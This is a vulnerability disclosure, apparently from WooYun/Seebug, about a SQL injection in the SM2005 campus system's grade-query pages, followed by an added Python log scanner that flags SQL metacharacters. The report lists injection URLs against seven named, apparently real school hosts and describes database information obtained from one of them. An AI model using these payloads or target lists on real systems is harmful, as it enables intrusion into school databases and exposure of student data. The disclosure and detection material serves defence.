### Brief description:

Generic SQL injection in a campus system

### Detailed description:

Vulnerability details: see WooYun, URL: [WooYun: SQL injection in a generic campus school-administration system](http://www.wooyun.org/bugs/wooyun-2014-082279)

This is one spot that was missed: the vulnerability is in the input of the student grade query.

Location: `SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb`

Injection parameter: `StartKSID`

Borrowing the cases from the earlier report:

- http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://www.dlwsxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0
- http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0

### Proof of vulnerability:

Taking the last one as an example: http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1

![1.png](https://images.seebug.org/upload/201502/111121092cf8478eecb6de8e8250812789b6a3bb.png)

Continuing:

![1.png](https://images.seebug.org/upload/201502/111122107d0234d965ad77ec048dffe39abd1bba.png)

Database information:

![2.png](https://images.seebug.org/upload/201502/11112222b386c59310359a9937ad5950d3464c9a.png)
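
For operators of an affected installation, one way to look for probing of the grade-query pages named in this report is to check web logs for requests whose `StartKSID`/`EndKSID` values are not plain integers or whose `txtStu` value carries SQL metacharacters. The following is an added example, not part of the original report or the vendor's code; the simplified four-field log layout, the set of parameters treated as numeric, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in a simplified "method uri-stem uri-query status" layout
# (assumption: real IIS W3C logs carry more fields; adjust the split accordingly).
SAMPLE_LOG = """\
GET /SM2005/student/StuCJ/StuResult.asp QueryFs=4&txtStu=zhang&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 200
GET /SM2005/student/StuCJ/StuResult.asp QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 500
GET /SM2005/student/StuCJ/StuResult.asp QueryFs=4&txtStu=li&ShowFS=1&StartKSID=3%27&EndKSID=15&checkbox1=0 200
GET /SM2005/index.asp - 200
"""

# The two grade-query pages named in the report.
TARGET = re.compile(r"/SM2005/student/StuCJ/Stu(Result|ScoreQuery)\.asp$", re.I)
# Assumption: these parameters are integer IDs, as in the URLs shown in the report.
NUMERIC_PARAMS = {"startksid", "endksid", "queryfs", "showfs"}
DIGITS = re.compile(r"[0-9]*")
SQL_META = re.compile(r"['\";]|--|/\*")

def suspicious_params(query):
    """Return names of parameters whose URL-decoded value has an unexpected shape."""
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name.lower() in NUMERIC_PARAMS:
                if not DIGITS.fullmatch(value):   # numeric ID carrying anything else
                    hits.append(name)
            elif SQL_META.search(value):          # free-text field with SQL metacharacters
                hits.append(name)
    return hits

def scan(log_text):
    """Return (line number, HTTP status, offending parameters) for flagged requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 4 or not TARGET.search(fields[1]):
            continue
        hits = suspicious_params(fields[2])
        if hits:
            findings.append((lineno, int(fields[3]), hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned 200 rather than 500 deserves the closer look, since the malformed value did not cause an error.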